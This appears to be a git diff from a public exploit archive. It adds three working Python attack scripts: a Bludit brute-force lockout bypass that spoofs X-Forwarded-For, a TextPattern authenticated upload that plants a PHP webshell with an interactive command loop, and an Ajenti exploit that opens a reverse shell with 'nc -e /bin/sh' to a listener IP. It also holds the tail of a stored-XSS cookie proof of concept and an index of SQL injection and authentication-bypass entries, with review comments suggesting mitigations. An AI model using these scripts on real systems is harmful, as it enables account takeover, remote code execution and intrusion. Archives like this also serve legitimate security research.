laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D + +-----------------------------10391575234966392972740129710 +Content-Disposition: form-data; name="id" + + +-----------------------------10391575234966392972740129710 +Content-Disposition: form-data; name="package" + + +-----------------------------10391575234966392972740129710 
+Content-Disposition: form-data; name="description" + + +-----------------------------10391575234966392972740129710 +Content-Disposition: form-data; name="amount" + +1 +-----------------------------10391575234966392972740129710-- + +Step 3: Cookie will be reflected each time someone visits the Packages section. \ No newline at end of file diff --git a/exploits/php/webapps/48942.py b/exploits/php/webapps/48942.py new file mode 100755 index 000000000..8ceec4d0a --- /dev/null +++ b/exploits/php/webapps/48942.py 
@@ -0,0 +1,102 @@ +#!/usr/bin/python3 + +# Exploit +## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass +## Author: ColdFusionX (Mayank Deshmukh) +## Author website: https://coldfusionx.github.io +## Date: 2020-10-19 +## Vendor Homepage: https://www.bludit.com/ +## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz +## Version: <= 3.9.2 + +# Vulnerability +## Discoverer: Rastating +## Discoverer website: https://rastating.github.io/ +## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240 +## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/ +## Patch: https://github.com/bludit/bludit/pull/1090 + +''' +Example Usage: +- ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt +''' + +import requests +import sys +import re +import argparse, textwrap +from pwn import * + +#Expected Arguments +parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, +epilog=textwrap.dedent(''' +Exploit Usage : +./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt +./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt''')) + +parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)") +parser.add_argument("-u","--userlist", help="Username Dictionary") +parser.add_argument("-p","--passlist", help="Password Dictionary") +args = parser.parse_args() + +if len(sys.argv) < 2: + print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]") + sys.exit(1) + +# Variable +LoginPage = args.url +Username_list = args.userlist +Password_list = args.passlist + +log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ') + +def login(Username,Password): + session = requests.session() + r = session.get(LoginPage) + +# Progress Check + process = log.progress('Brute Force') + +#Getting CSRF token value + 
CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text) + CSRF = CSRF.group(1) + +#Specifying Headers Value + headerscontent = { + 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', + 'Referer' : f"{LoginPage}", + 'X-Forwarded-For' : f"{Password}" + } + +#POST REQ data + postreqcontent = { + 'tokenCSRF' : f"{CSRF}", + 'username' : f"{Username}", + 'password' : f"{Password}" + } + +#Sending POST REQ + r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) + +#Printing Username:Password + process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) + +#Conditional loops + if 'Location' in r.headers: + if "/admin/dashboard" in r.headers['Location']: + print() + log.info(f'SUCCESS !!') + log.success(f"Use Credential -> {Username}:{Password}") + sys.exit(0) + elif "has been blocked" in r.text: + log.failure(f"{Password} - Word BLOCKED") + +#Reading User.txt & Pass.txt files +userfile = open(Username_list).readlines() +for Username in userfile: + Username = Username.strip() + +passfile = open(Password_list).readlines() +for Password in passfile: + Password = Password.strip() + login(Username,Password) \ No newline at end of file diff --git a/exploits/php/webapps/48943.py b/exploits/php/webapps/48943.py new file mode 100755 index 000000000..4d4a46950 --- /dev/null +++ b/exploits/php/webapps/48943.py 
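Review bot: The header of 48942.py links the upstream patch but never says what a defender should change or look for, although `login()` makes the mechanism visible. Every attempt sets `'X-Forwarded-For' : f"{Password}"` and the script treats "has been blocked" as the lockout signal, which suggests the lockout is keyed on that client-supplied header. I would add header comments next to `## Patch:` such as `## Mitigation: upgrade to a release containing the linked patch; do not key login lockout on a client-supplied X-Forwarded-For` and `## Detection: repeated failed logins from one peer address with a different X-Forwarded-For on each request`.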
@@ -0,0 +1,158 @@
+#!/usr/bin/python3
+
+# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
+# Google Dork: N/A
+# Date: 16/10/2020
+# Exploit Author: Michele '0blio_' Cisternino
+# Vendor Homepage: https://textpattern.com/
+# Software Link: https://github.com/textpattern/textpattern
+# Version: <= 4.8.3
+# Tested on: Kali Linux x64
+# CVE: N/A
+
+import sys
+import json
+import requests
+from bs4 import BeautifulSoup as bs4
+from time import sleep
+import random
+import string
+import readline
+
+# Disable SSL warnings
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+# Simple Terminal User Interface class I wrote to print run-time logs and headers
+class Tui ():
+ def __init__ (self):
+ self.red = '\033[91m'
+ self.green = '\033[92m'
+ self.blue = '\033[94m'
+ self.yellow = '\033[93m'
+ self.pink = '\033[95m'
+ self.end = '\033[0m'
+ self.bold = '\033[1m'
+
+ def header (self, software, author, cve='N/A'):
+ print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
+ print ("{}CVE:{} {}".format(self.pink, self.end, cve))
+ print ("{}Author:{} {}\n".format(self.pink, self.end, author))
+
+ def info (self, message):
+ print ("[{}*{}] {}".format(self.blue, self.end, message))
+
+ def greatInfo (self, message):
+ print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))
+
+ def success (self, message):
+ print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))
+
+ def warning (self, message):
+ print ("[{}!{}] {}".format(self.yellow, self.end, message))
+
+ def error (self, message):
+ print ("[{}✗{}] {}".format(self.red, self.end, message))
+
+log = Tui()
+log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")
+
+if len(sys.argv) < 4:
+ log.info ("USAGE: python3 exploit.py http://target.com username password")
+ log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
+ sys.exit()
+
+# Get input from the command line
+target, username, password = sys.argv[1:4]
+
+# Fixing URL
+target = target.strip()
+if not target.startswith("https://") and not target.startswith("http://"):
+ target = "http://" + target
+if not target.endswith("/"):
+ target = target + "/"
+
+accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}
+
+# Login
+log.info ("Authenticating to the target as '{}'".format(username))
+s = requests.Session()
+try:
+ r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
+ sleep(1)
+ if r.status_code == 200:
+ log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
+ sleep(1)
+
+ # Parsing the response to find the upload token inside the main json array
+ log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
+ soup = bs4(r.text, 'html.parser')
+ scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
+ scriptJS = json.loads(scriptJS)
+ uploadToken = scriptJS['_txp_token']
+ log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))
+
+ # The server reply with a 401 with the user provide wrong creds as input
+ elif r.status_code == 401:
+ log.error ("Unable to login. You provided wrong credentials..\n")
+ sys.exit()
+except requests.exceptions.ConnectionError:
+ log.error ("Unable to connect to the target!")
+ sys.exit()
+
+# Crafting the upload request here
+headers = {
+ "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+ "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
+ "Accept-Encoding" : "gzip, deflate",
+ "X-Requested-With" : "XMLHttpRequest",
+ "Connection" : "close",
+}
+
+# Generating random webshell name
+randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'
+
+# Mapping multiparts here
+multipart_form_data = {
+ "fileInputOrder" : (None, '1/1'),
+ "app_mode" : (None, 'async'),
+ "MAX_FILE_SIZE" : (None, '2000000'),
+ "event" : (None, 'file'),
+ "step" : (None, 'file_insert'),
+ "id" : (None, ' '),
+ "_txp_token" : (None, uploadToken), # Token here
+ "thefile[]" : (randomFilename, '') # lol
+}
+
+# Uploading the webshell
+log.warning ("Sending payload..")
+
+try:
+ r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
+ if "Files uploaded" in r.text:
+ log.success ("Webshell uploaded successfully as {}".format(randomFilename))
+except:
+ log.error ("Unexpected error..")
+ sys.exit()
+
+sleep(2)
+
+# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
+log.greatInfo ("Interacting with the HTTP webshell..")
+sleep (1)
+print()
+
+while 1:
+ try:
+ cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
+ if cmd == 'exit':
+ raise KeyboardInterrupt
+ r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
+ print (r.text)
+ except KeyboardInterrupt:
+ log.warning ("Stopped.")
+ exit()
+ except:
+ log.error ("Unexpected error..")
+ sys.exit()
+
+print()
\ No newline at end of file
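Review bot: In `48943.py`, the `log.header(...)` call prints `cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload"` while the file header says `# CVE: N/A`; a placeholder shaped like a real identifier tends to be copied into tickets and scanner notes, so I would pass `cve="N/A"` there. The file also carries no remediation note: since the uploaded file is requested back from `files/` with a `.php` name, a header comment such as `# Mitigation: deny script execution in the files/ upload directory and limit which accounts hold file-upload rights` would tell a defender what to check. Separately, the `log.success` line after login echoes the `txp_login` cookie values to the terminal and every request is sent with `verify=False`, so session material from an authorised test can end up in scrollback or in front of an interposed proxy; I would drop the cookie values from that message.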
diff --git a/exploits/python/webapps/48929.py b/exploits/python/webapps/48929.py
new file mode 100755
index 000000000..3529c82f8
--- /dev/null
+++ b/exploits/python/webapps/48929.py
@@ -0,0 +1,53 @@
+ #!/usr/bin/python3
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+import json
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) < 6:
+ print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
+ exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+req = requests.session()
+login_creds = {
+ "username":username,
+ "password":password,
+ "mode":"normal"}
+
+
+
+print("[+] Sendin login request...")
+login = req.post(url+"/api/core/auth", json = login_creds)
+
+
+if username in login.text:
+
+ page = url + "/api/terminal/create"
+
+ payload = {
+
+ 'command':'nc -e /bin/sh ' + ip + ' ' + port ,
+ 'autoclose':True
+
+
+ }
+ payload = json.dumps(payload)
+ print("[+] Sending payload...")
+
+ send_payload = req.post(page, payload)
+
+ print("[+] Check your listener !...")
+
+else:
+ print("[-] Wrong credentials or may the system patched.")
+ exit()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ab5e87ad1..dfcd07756 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
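Review bot: `48929.py` is added with no metadata header at all (no title, affected version, author or date), unlike the other two scripts in this commit, so the only place that says it targets Ajenti 2.1.36 and needs valid credentials is its row in `files_exploits.csv`. I would add under the first line `# Exploit Title: Ajenti 2.1.36 - Remote Code Execution (Authenticated)`, `# Date: 2020-10-23` and `# Exploit Author: Ahmet Ümit BAYRAM`, all taken from that row. The first added line also appears to carry whitespace before `#!`, which would stop it being read as an interpreter line for a mode 100755 file; whitespace on this page is collapsed, so that needs confirming against the raw file. For defenders the useful fact to record in the header is that `/api/terminal/create` is only called after `/api/core/auth` accepts the login, so exposure comes down to who can reach the panel and how well its accounts are protected.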
@@ -40746,6 +40746,22 @@ id,file,description,date,author,type,platform,port
 48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
 48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
 48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php,
+48928,exploits/php/webapps/48928.txt,"Online Library Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php,
+48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,
+48930,exploits/php/webapps/48930.txt,"Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,
+48931,exploits/php/webapps/48931.txt,"Car Rental Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php,
+48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,
+48933,exploits/php/webapps/48933.txt,"Point of Sales 1.0 - 'id' SQL Injection",2020-10-23,"Ankita Pal",webapps,php,
+48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,
+48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,
+48936,exploits/php/webapps/48936.txt,"Gym Management System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48937,exploits/php/webapps/48937.txt,"Point of Sales 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48938,exploits/php/webapps/48938.txt,"School Faculty Scheduling System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48939,exploits/php/webapps/48939.txt,"School Faculty Scheduling System 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48940,exploits/php/webapps/48940.txt,"Gym Management System 1.0 - Authentication Bypass",2020-10-23,"Jyotsna Adhana",webapps,php,
+48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,
+48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,
+48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,